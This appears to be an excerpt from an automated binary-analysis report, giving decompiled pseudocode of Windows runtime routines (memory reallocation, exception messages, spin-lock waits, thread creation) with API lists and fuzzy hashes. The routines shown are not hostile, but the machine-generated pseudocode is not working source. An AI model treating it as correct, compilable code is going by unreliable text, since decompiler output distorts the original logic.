                                                            Similarity
                                                            • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                            • String ID:
                                                            • API String ID: 135118572-0
                                                            • Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                            • Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
                                                            • Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                            • Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
                                                            				signed int __ebx;
                                                            				void* __esi;
                                                            				signed int _t69;
                                                            				signed int _t78;
                                                            				signed int _t93;
                                                            				long _t94;
                                                            				void* _t100;
                                                            				signed int _t102;
                                                            				signed int _t109;
                                                            				signed int _t115;
                                                            				signed int _t123;
                                                            				signed int _t129;
                                                            				void* _t131;
                                                            				signed int _t140;
                                                            				unsigned int _t148;
                                                            				signed int _t150;
                                                            				long _t152;
                                                            				signed int _t156;
                                                            				intOrPtr _t161;
                                                            				signed int _t166;
                                                            				signed int _t170;
                                                            				unsigned int _t171;
                                                            				intOrPtr _t174;
                                                            				intOrPtr _t192;
                                                            				signed int _t195;
                                                            				signed int _t196;
                                                            				signed int _t197;
                                                            				void* _t205;
                                                            				unsigned int _t207;
                                                            				intOrPtr _t213;
                                                            				void* _t225;
                                                            				intOrPtr _t227;
                                                            				void* _t228;
                                                            				signed int _t230;
                                                            				void* _t232;
                                                            				signed int _t233;
                                                            				signed int _t234;
                                                            				signed int _t238;
                                                            				signed int _t241;
                                                            				void* _t243;
                                                            				intOrPtr* _t244;
                                                            
                                                            				_t176 = __edx;
                                                            				_t66 = __eax;
                                                            				_t166 =  *(__eax - 4);
                                                            				_t217 = __eax;
                                                            				if((_t166 & 0x00000007) != 0) {
                                                            					__eflags = _t166 & 0x00000005;
                                                            					if((_t166 & 0x00000005) != 0) {
                                                            						_pop(_t217);
                                                            						_pop(_t145);
                                                            						__eflags = _t166 & 0x00000003;
                                                            						if((_t166 & 0x00000003) == 0) {
                                                            							_push(_t145);
                                                            							_push(__eax);
                                                            							_push(__edi);
                                                            							_push(_t225);
                                                            							_t244 = _t243 + 0xffffffe0;
                                                            							_t218 = __edx;
                                                            							_t202 = __eax;
                                                            							_t69 =  *(__eax - 4);
                                                            							_t148 = (0xfffffff0 & _t69) - 0x14;
                                                            							if(0xfffffff0 >= __edx) {
                                                            								__eflags = __edx - _t148 >> 1;
                                                            								if(__edx < _t148 >> 1) {
                                                            									_t150 = E00403EE8(__edx);
                                                            									__eflags = _t150;
                                                            									if(_t150 != 0) {
                                                            										__eflags = _t218 - 0x40a2c;
                                                            										if(_t218 > 0x40a2c) {
                                                            											_t78 = _t202 - 0x10;
                                                            											__eflags = _t78;
                                                            											 *((intOrPtr*)(_t78 + 8)) = _t218;
                                                            										}
                                                            										E00403AA4(_t202, _t218, _t150);
                                                            										E0040426C(_t202, _t202, _t225);
                                                            									}
                                                            								} else {
                                                            									_t150 = __eax;
                                                            									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
                                                            								}
                                                            							} else {
                                                            								if(0xfffffff0 <= __edx) {
                                                            									_t227 = __edx;
                                                            								} else {
                                                            									_t227 = 0xbadb9d;
                                                            								}
                                                            								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
                                                            								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
                                                            								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
                                                            									L12:
                                                            									_t150 = E00403EE8(_t227);
                                                            									__eflags = _t150;
                                                            									if(_t150 != 0) {
                                                            										__eflags = _t227 - 0x40a2c;
                                                            										if(_t227 > 0x40a2c) {
                                                            											_t93 = _t150 - 0x10;
                                                            											__eflags = _t93;
                                                            											 *((intOrPtr*)(_t93 + 8)) = _t218;
                                                            										}
                                                            										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
                                                            										E0040426C(_t202, _t202, _t227);
                                                            									}
                                                            								} else {
                                                            									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
                                                            									_t94 =  *(_t244 + 0x10);
                                                            									if(_t218 - _t148 >= _t94) {
                                                            										goto L12;
                                                            									} else {
                                                            										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
                                                            										if(_t94 < _t152) {
                                                            											_t152 = _t94;
                                                            										}
                                                            										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
                                                            											goto L12;
                                                            										} else {
                                                            											_t100 = _t202 - 0x10;
                                                            											 *((intOrPtr*)(_t100 + 8)) = _t218;
                                                            											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
                                                            											_t150 = _t202;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            							return _t150;
                                                            						} else {
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            					} else {
                                                            						_t170 = _t166 & 0xfffffff0;
                                                            						_push(__edi);
                                                            						_t205 = _t170 + __eax;
                                                            						_t171 = _t170 - 4;
                                                            						_t156 = _t166 & 0x0000000f;
                                                            						__eflags = __edx - _t171;
                                                            						_push(_t225);
                                                            						if(__edx > _t171) {
                                                            							_t102 =  *(_t205 - 4);
                                                            							__eflags = _t102 & 0x00000001;
                                                            							if((_t102 & 0x00000001) == 0) {
                                                            								L75:
                                                            								asm("adc edi, 0xffffffff");
                                                            								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
                                                            								_t207 = _t171;
                                                            								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
                                                            								_t192 = _t176;
                                                            								__eflags = _t109;
                                                            								if(_t109 == 0) {
                                                            									goto L73;
                                                            								} else {
                                                            									__eflags = _t228 - 0x40a2c;
                                                            									if(_t228 > 0x40a2c) {
                                                            										 *((intOrPtr*)(_t109 - 8)) = _t192;
                                                            									}
                                                            									_t230 = _t109;
                                                            									E00403A74(_t217, _t207, _t109);
                                                            									E0040426C(_t217, _t207, _t230);
                                                            									return _t230;
                                                            								}
                                                            							} else {
                                                            								_t115 = _t102 & 0xfffffff0;
                                                            								_t232 = _t171 + _t115;
                                                            								__eflags = __edx - _t232;
                                                            								if(__edx > _t232) {
                                                            									goto L75;
                                                            								} else {
                                                            									__eflags =  *0x4bb059;
                                                            									if(__eflags == 0) {
                                                            										L66:
                                                            										__eflags = _t115 - 0xb30;
                                                            										if(_t115 >= 0xb30) {
                                                            											E00403AC0(_t205);
                                                            											_t176 = _t176;
                                                            											_t171 = _t171;
                                                            										}
                                                            										asm("adc edi, 0xffffffff");
                                                            										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
                                                            										_t195 = _t232 + 4 - _t123;
                                                            										__eflags = _t195;
                                                            										if(_t195 > 0) {
                                                            											 *(_t217 + _t232 - 4) = _t195;
                                                            											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
                                                            											_t233 = _t123;
                                                            											__eflags = _t195 - 0xb30;
                                                            											if(_t195 >= 0xb30) {
                                                            												__eflags = _t123 + _t217;
                                                            												E00403B00(_t123 + _t217, _t171, _t195);
                                                            											}
                                                            										} else {
                                                            											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
                                                            											_t233 = _t232 + 4;
                                                            										}
                                                            										_t234 = _t233 | _t156;
                                                            										__eflags = _t234;
                                                            										 *(_t217 - 4) = _t234;
                                                            										 *0x4bbae8 = 0;
                                                            										_t109 = _t217;
                                                            										L73:
                                                            										return _t109;
                                                            									} else {
                                                            										while(1) {
                                                            											asm("lock cmpxchg [0x4bbae8], ah");
                                                            											if(__eflags == 0) {
                                                            												break;
                                                            											}
                                                            											asm("pause");
                                                            											__eflags =  *0x4bb989;
                                                            											if(__eflags != 0) {
                                                            												continue;
                                                            											} else {
                                                            												Sleep(0);
                                                            												_t176 = _t176;
                                                            												_t171 = _t171;
                                                            												asm("lock cmpxchg [0x4bbae8], ah");
                                                            												if(__eflags != 0) {
                                                            													Sleep(0xa);
                                                            													_t176 = _t176;
                                                            													_t171 = _t171;
                                                            													continue;
                                                            												}
                                                            											}
                                                            											break;
                                                            										}
                                                            										_t156 = 0x0000000f &  *(_t217 - 4);
                                                            										_t129 =  *(_t205 - 4);
                                                            										__eflags = _t129 & 0x00000001;
                                                            										if((_t129 & 0x00000001) == 0) {
                                                            											L74:
                                                            											 *0x4bbae8 = 0;
                                                            											goto L75;
                                                            										} else {
                                                            											_t115 = _t129 & 0xfffffff0;
                                                            											_t232 = _t171 + _t115;
                                                            											__eflags = _t176 - _t232;
                                                            											if(_t176 > _t232) {
                                                            												goto L74;
                                                            											} else {
                                                            												goto L66;
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						} else {
                                                            							__eflags = __edx + __edx - _t171;
                                                            							if(__edx + __edx < _t171) {
                                                            								__eflags = __edx - 0xb2c;
                                                            								if(__edx >= 0xb2c) {
                                                            									L41:
                                                            									_t32 = _t176 + 0xd3; // 0xbff
                                                            									_t238 = (_t32 & 0xffffff00) + 0x30;
                                                            									_t174 = _t171 + 4 - _t238;
                                                            									__eflags =  *0x4bb059;
                                                            									if(__eflags != 0) {
                                                            										while(1) {
                                                            											asm("lock cmpxchg [0x4bbae8], ah");
                                                            											if(__eflags == 0) {
                                                            												break;
                                                            											}
                                                            											asm("pause");
                                                            											__eflags =  *0x4bb989;
                                                            											if(__eflags != 0) {
                                                            												continue;
                                                            											} else {
                                                            												Sleep(0);
                                                            												_t174 = _t174;
                                                            												asm("lock cmpxchg [0x4bbae8], ah");
                                                            												if(__eflags != 0) {
                                                            													Sleep(0xa);
                                                            													_t174 = _t174;
                                                            													continue;
                                                            												}
                                                            											}
                                                            											break;
                                                            										}
                                                            										_t156 = 0x0000000f &  *(_t217 - 4);
                                                            										__eflags = 0xf;
                                                            									}
                                                            									 *(_t217 - 4) = _t156 | _t238;
                                                            									_t161 = _t174;
                                                            									_t196 =  *(_t205 - 4);
                                                            									__eflags = _t196 & 0x00000001;
                                                            									if((_t196 & 0x00000001) != 0) {
                                                            										_t131 = _t205;
                                                            										_t197 = _t196 & 0xfffffff0;
                                                            										_t161 = _t161 + _t197;
                                                            										_t205 = _t205 + _t197;
                                                            										__eflags = _t197 - 0xb30;
                                                            										if(_t197 >= 0xb30) {
                                                            											E00403AC0(_t131);
                                                            										}
                                                            									} else {
                                                            										 *(_t205 - 4) = _t196 | 0x00000008;
                                                            									}
                                                            									 *((intOrPtr*)(_t205 - 8)) = _t161;
                                                            									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
                                                            									__eflags = _t161 - 0xb30;
                                                            									if(_t161 >= 0xb30) {
                                                            										E00403B00(_t217 + _t238, _t174, _t161);
                                                            									}
                                                            									 *0x4bbae8 = 0;
                                                            									return _t217;
                                                            								} else {
                                                            									__eflags = __edx - 0x2cc;
                                                            									if(__edx < 0x2cc) {
                                                            										_t213 = __edx;
                                                            										_t140 = E00403EE8(__edx);
                                                            										__eflags = _t140;
                                                            										if(_t140 != 0) {
                                                            											_t241 = _t140;
                                                            											E00403AA4(_t217, _t213, _t140);
                                                            											E0040426C(_t217, _t213, _t241);
                                                            											_t140 = _t241;
                                                            										}
                                                            										return _t140;
                                                            									} else {
                                                            										_t176 = 0xb2c;
                                                            										__eflags = _t171 - 0xb2c;
                                                            										if(_t171 <= 0xb2c) {
                                                            											goto L37;
                                                            										} else {
                                                            											goto L41;
                                                            										}
                                                            									}
                                                            								}
                                                            							} else {
                                                            								L37:
                                                            								return _t66;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					__ebx =  *__ecx;
                                                            					__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                            					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                            					__eflags = __ecx - __edx;
                                                            					if(__ecx < __edx) {
                                                            						__ecx = __ecx + __ecx + 0x20;
                                                            						_push(__edi);
                                                            						__edi = __edx;
                                                            						__eax = 0;
                                                            						__ecx = __ecx - __edx;
                                                            						asm("adc eax, 0xffffffff");
                                                            						__eax = 0 & __ecx;
                                                            						__eax = (0 & __ecx) + __edx;
                                                            						__eax = E00403EE8((0 & __ecx) + __edx);
                                                            						__eflags = __eax;
                                                            						if(__eax != 0) {
                                                            							__eflags = __edi - 0x40a2c;
                                                            							if(__edi > 0x40a2c) {
                                                            								 *(__eax - 8) = __edi;
                                                            							}
                                                            							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                            							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                            							__edx = __eax;
                                                            							__edi = __eax;
                                                            							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
                                                            							__eax = __edi;
                                                            						}
                                                            						_pop(__edi);
                                                            						_pop(__esi);
                                                            						_pop(__ebx);
                                                            						return __eax;
                                                            					} else {
                                                            						__ebx = 0x40 + __edx * 4;
                                                            						__eflags = 0x40 + __edx * 4 - __ecx;
                                                            						if(0x40 + __edx * 4 < __ecx) {
                                                            							__ebx = __edx;
                                                            							__eax = __edx;
                                                            							__eax = E00403EE8(__edx);
                                                            							__eflags = __eax;
                                                            							if(__eax != 0) {
                                                            								__ecx = __ebx;
                                                            								__edx = __eax;
                                                            								__ebx = __eax;
                                                            								__esi = E0040426C(__esi, __edi, __ebp);
                                                            								__eax = __ebx;
                                                            							}
                                                            							_pop(__esi);
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						} else {
                                                            							_pop(__esi);
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						}
                                                            					}
                                                            				}
                                                            			}













































                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                            • Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
                                                            • Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                            • Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				char _v8;
                                                            				struct _MEMORY_BASIC_INFORMATION _v36;
                                                            				short _v558;
                                                            				char _v564;
                                                            				intOrPtr _v568;
                                                            				char _v572;
                                                            				char _v576;
                                                            				char _v580;
                                                            				intOrPtr _v584;
                                                            				char _v588;
                                                            				void* _v592;
                                                            				char _v596;
                                                            				char _v600;
                                                            				char _v604;
                                                            				char _v608;
                                                            				intOrPtr _v612;
                                                            				char _v616;
                                                            				char _v620;
                                                            				char _v624;
                                                            				void* _v628;
                                                            				char _v632;
                                                            				void* _t64;
                                                            				intOrPtr _t65;
                                                            				long _t76;
                                                            				intOrPtr _t82;
                                                            				intOrPtr _t103;
                                                            				intOrPtr _t107;
                                                            				intOrPtr _t110;
                                                            				intOrPtr _t112;
                                                            				intOrPtr _t115;
                                                            				intOrPtr _t127;
                                                            				void* _t136;
                                                            				intOrPtr _t138;
                                                            				void* _t141;
                                                            				void* _t143;
                                                            
                                                            				_t136 = __edi;
                                                            				_t140 = _t141;
                                                            				_v632 = 0;
                                                            				_v596 = 0;
                                                            				_v604 = 0;
                                                            				_v600 = 0;
                                                            				_v8 = 0;
                                                            				_push(_t141);
                                                            				_push(0x41f9a6);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t141 + 0xfffffd8c;
                                                            				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
                                                            				_t143 = _t64;
                                                            				if(_t143 < 0) {
                                                            					_t65 =  *0x4ba798; // 0x40e730
                                                            					E0040C9F0(_t65,  &_v8, _t140);
                                                            				} else {
                                                            					if(_t143 == 0) {
                                                            						_t107 =  *0x4ba670; // 0x40e738
                                                            						E0040C9F0(_t107,  &_v8, _t140);
                                                            					} else {
                                                            						if(_t64 == 7) {
                                                            							_t110 =  *0x4ba4d0; // 0x40e740
                                                            							E0040C9F0(_t110,  &_v8, _t140);
                                                            						} else {
                                                            							_t112 =  *0x4ba5c8; // 0x40e748
                                                            							E0040C9F0(_t112,  &_v8, _t140);
                                                            						}
                                                            					}
                                                            				}
                                                            				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
                                                            				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
                                                            				_t138 = _v36.State;
                                                            				if(_t138 == 0x1000 || _t138 == 0x10000) {
                                                            					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
                                                            					_t147 = _t76;
                                                            					if(_t76 == 0) {
                                                            						goto L12;
                                                            					} else {
                                                            						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
                                                            						_v588 = 5;
                                                            						E0040858C( &_v600, 0x105,  &_v558);
                                                            						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
                                                            						_v584 = _v596;
                                                            						_v580 = 0x11;
                                                            						_v576 = _v8;
                                                            						_v572 = 0x11;
                                                            						_v568 = _t115;
                                                            						_v564 = 5;
                                                            						_push( &_v592);
                                                            						_t103 =  *0x4ba6e0; // 0x40e810
                                                            						E0040C9F0(_t103,  &_v604, _t140, 3);
                                                            						E0041F2A0(_t115, _v604, 1, _t136, _t138);
                                                            					}
                                                            				} else {
                                                            					L12:
                                                            					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
                                                            					_v624 = 5;
                                                            					_v620 = _v8;
                                                            					_v616 = 0x11;
                                                            					_v612 = _t115;
                                                            					_v608 = 5;
                                                            					_push( &_v628);
                                                            					_t82 =  *0x4ba67c; // 0x40e6d8
                                                            					E0040C9F0(_t82,  &_v632, _t140, 2);
                                                            					E0041F2A0(_t115, _v632, 1, _t136, _t138);
                                                            				}
                                                            				_pop(_t127);
                                                            				 *[fs:eax] = _t127;
                                                            				_push(0x41f9ad);
                                                            				E00407A20( &_v632);
                                                            				E00407A80( &_v604, 3);
                                                            				return E00407A20( &_v8);
                                                            			}

                                                            APIs
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C
                                                              • Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                            • String ID: 0@$8@$@@$H@
                                                            • API String ID: 902310565-4161625419
                                                            • Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                            • Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
                                                            • Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                            • Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E00406688(signed char* __eax, void* __edx, void* __eflags) {
                                                            				void* _t49;
                                                            				signed char _t56;
                                                            				intOrPtr _t57;
                                                            				signed char _t59;
                                                            				void* _t70;
                                                            				signed char* _t71;
                                                            				intOrPtr _t72;
                                                            				signed char* _t73;
                                                            
                                                            				_t70 = __edx;
                                                            				_t71 = __eax;
                                                            				_t72 =  *((intOrPtr*)(__eax + 0x10));
                                                            				while(1) {
                                                            					L1:
                                                            					 *_t73 = E00406B30(_t71);
                                                            					if( *_t73 != 0 || _t70 == 0) {
                                                            						break;
                                                            					}
                                                            					_t73[1] = 0;
                                                            					if(_t72 <= 0) {
                                                            						while(1) {
                                                            							L17:
                                                            							_t56 =  *_t71;
                                                            							if(_t56 == 0) {
                                                            								goto L1;
                                                            							}
                                                            							asm("lock cmpxchg [esi], edx");
                                                            							if(_t56 != _t56) {
                                                            								continue;
                                                            							} else {
                                                            								goto L19;
                                                            							}
                                                            							do {
                                                            								L19:
                                                            								_t73[4] = GetTickCount();
                                                            								E0040688C(_t71);
                                                            								_t57 =  *0x4bb8f8; // 0x4b9284
                                                            								 *((intOrPtr*)(_t57 + 0x10))();
                                                            								 *_t73 = 0 == 0;
                                                            								if(_t70 != 0xffffffff) {
                                                            									_t73[8] = GetTickCount();
                                                            									if(_t70 <= _t73[8] - _t73[4]) {
                                                            										_t70 = 0;
                                                            									} else {
                                                            										_t70 = _t70 - _t73[8] - _t73[4];
                                                            									}
                                                            								}
                                                            								if( *_t73 == 0) {
                                                            									do {
                                                            										asm("lock cmpxchg [esi], edx");
                                                            									} while ( *_t71 !=  *_t71);
                                                            									_t73[1] = 1;
                                                            								} else {
                                                            									while(1) {
                                                            										_t59 =  *_t71;
                                                            										if((_t59 & 0x00000001) != 0) {
                                                            											goto L29;
                                                            										}
                                                            										asm("lock cmpxchg [esi], edx");
                                                            										if(_t59 != _t59) {
                                                            											continue;
                                                            										}
                                                            										_t73[1] = 1;
                                                            										goto L29;
                                                            									}
                                                            								}
                                                            								L29:
                                                            							} while (_t73[1] == 0);
                                                            							if( *_t73 != 0) {
                                                            								_t71[8] = GetCurrentThreadId();
                                                            								_t71[4] = 1;
                                                            							}
                                                            							goto L32;
                                                            						}
                                                            						continue;
                                                            					}
                                                            					_t73[4] = GetTickCount();
                                                            					_t73[0xc] = 0;
                                                            					if(_t72 <= 0) {
                                                            						L13:
                                                            						if(_t70 == 0xffffffff) {
                                                            							goto L17;
                                                            						}
                                                            						_t73[8] = GetTickCount();
                                                            						_t49 = _t73[8] - _t73[4];
                                                            						if(_t70 > _t49) {
                                                            							_t70 = _t70 - _t49;
                                                            							goto L17;
                                                            						}
                                                            						 *_t73 = 0;
                                                            						break;
                                                            					}
                                                            					L5:
                                                            					L5:
                                                            					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
                                                            						goto L8;
                                                            					} else {
                                                            						 *_t73 = 0;
                                                            					}
                                                            					break;
                                                            					L8:
                                                            					if( *_t71 > 1) {
                                                            						goto L13;
                                                            					}
                                                            					if( *_t71 != 0) {
                                                            						L12:
                                                            						E00406368( &(_t73[0xc]));
                                                            						_t72 = _t72 - 1;
                                                            						if(_t72 > 0) {
                                                            							goto L5;
                                                            						}
                                                            						goto L13;
                                                            					}
                                                            					asm("lock cmpxchg [esi], edx");
                                                            					if(0 != 0) {
                                                            						goto L12;
                                                            					}
                                                            					_t71[8] = GetCurrentThreadId();
                                                            					_t71[4] = 1;
                                                            					 *_t73 = 1;
                                                            					break;
                                                            				}
                                                            				L32:
                                                            				return  *_t73 & 0x000000ff;
                                                            			}
                                                            0x004066d5
                                                            0x00000000
                                                            0x004066e4
                                                            0x004066e4
                                                            0x004066e4
                                                            0x00000000
                                                            0x004066ed
                                                            0x004066f0
                                                            0x00000000
                                                            0x00000000
                                                            0x004066f5
                                                            0x0040671e
                                                            0x00406722
                                                            0x00406727
                                                            0x0040672a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040672a
                                                            0x004066fe
                                                            0x00406704
                                                            0x00000000
                                                            0x00000000
                                                            0x0040670b
                                                            0x0040670e
                                                            0x00406715
                                                            0x00000000
                                                            0x00406715
                                                            0x00406811
                                                            0x0040681c

                                                            APIs
                                                              • Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33
                                                            • GetTickCount.KERNEL32 ref: 004066BF
                                                            • GetTickCount.KERNEL32 ref: 004066D7
                                                            • GetCurrentThreadId.KERNEL32 ref: 00406706
                                                            • GetTickCount.KERNEL32 ref: 00406731
                                                            • GetTickCount.KERNEL32 ref: 00406768
                                                            • GetTickCount.KERNEL32 ref: 00406792
                                                            • GetCurrentThreadId.KERNEL32 ref: 00406802
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CountTick$CurrentThread
                                                            • String ID:
                                                            • API String ID: 3968769311-0
                                                            • Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                            • Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
                                                            • Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                            • Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 80%
                                                            			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				char _v5;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				void* _t23;
                                                            				char _t29;
                                                            				void* _t50;
                                                            				intOrPtr _t55;
                                                            				char _t57;
                                                            				intOrPtr _t59;
                                                            				void* _t64;
                                                            				void* _t66;
                                                            				void* _t68;
                                                            				void* _t69;
                                                            				intOrPtr _t70;
                                                            
                                                            				_t64 = __edi;
                                                            				_t57 = __edx;
                                                            				_t50 = __ecx;
                                                            				_t68 = _t69;
                                                            				_t70 = _t69 + 0xfffffff0;
                                                            				_v20 = 0;
                                                            				if(__edx != 0) {
                                                            					_t70 = _t70 + 0xfffffff0;
                                                            					_t23 = E004062B0(_t23, _t68);
                                                            				}
                                                            				_t49 = _t50;
                                                            				_v5 = _t57;
                                                            				_t66 = _t23;
                                                            				_push(_t68);
                                                            				_push(0x4972a5);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t70;
                                                            				E00405CB8(0);
                                                            				_t3 = _t66 + 0x2c; // 0x266461
                                                            				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
                                                            				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
                                                            					_t29 = 0;
                                                            				} else {
                                                            					_t29 = 1;
                                                            				}
                                                            				 *((char*)(_t66 + 0xd)) = _t29;
                                                            				if( *(_t66 + 0x2c) != 0) {
                                                            					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
                                                            					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
                                                            				} else {
                                                            					if(_a4 == 0) {
                                                            						_t12 = _t66 + 4; // 0x495548
                                                            						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
                                                            					} else {
                                                            						_t9 = _t66 + 4; // 0x495548
                                                            						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
                                                            					}
                                                            					if( *((intOrPtr*)(_t66 + 8)) == 0) {
                                                            						E0041DFB0(GetLastError(), _t49, 0, _t66);
                                                            						_v16 = _v20;
                                                            						_v12 = 0x11;
                                                            						_t55 =  *0x4ba740; // 0x40ea6c
                                                            						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
                                                            						E0040711C();
                                                            					}
                                                            				}
                                                            				_pop(_t59);
                                                            				 *[fs:eax] = _t59;
                                                            				_push(0x4972ac);
                                                            				return E00407A20( &_v20);
                                                            			}



















                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247
